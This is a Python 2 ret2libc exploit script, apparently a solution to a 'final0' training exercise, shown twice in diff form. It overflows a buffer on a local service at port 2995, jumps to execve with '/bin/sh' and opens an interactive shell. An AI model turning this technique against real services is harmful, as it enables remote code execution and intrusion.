luc-lynx · December 18, 2017 07:29
diff --git a/final0.py b/final0.py
 # ret2libc technique

 import struct
 import socket
 import telnetlib

 HOST = '127.0.0.1'
 PORT = 2995

 padding = 'a' * 510 + '\x00' + 'aaaabbbbccccddddeeeef'

 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((HOST, PORT))

 execve_ret = "AAAA" # return address for execve (we don't care about it)
 execve = struct.pack("I", 0x08048c0c) # execve address
 binsh = struct.pack("I", 1176511 + 0xb7e97000) # "/bin/sh" string address in the libc
 exploit = padding + execve + execve_ret + binsh + '\x00' * 8

 s.send(exploit + '\n')
 s.send("id\n")
 s.send("uname -a\n")

 print s.recv(1024)

 t = telnetlib.Telnet()
 t.sock = s
 t.interact()
	# ret2libc technique

	import struct
	import socket
	import telnetlib

	HOST = '127.0.0.1'
	PORT = 2995

	padding = 'a' * 510 + '\x00' + 'aaaabbbbccccddddeeeef'

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((HOST, PORT))

	execve_ret = "AAAA" # return address for execve (we don't care about it)
	execve = struct.pack("I", 0x08048c0c) # execve address
	binsh = struct.pack("I", 1176511 + 0xb7e97000) # "/bin/sh" string address in the libc
	exploit = padding + execve + execve_ret + binsh + '\x00' * 8

	s.send(exploit + '\n')
	s.send("id\n")
	s.send("uname -a\n")

	print s.recv(1024)

	t = telnetlib.Telnet()
	t.sock = s
	t.interact()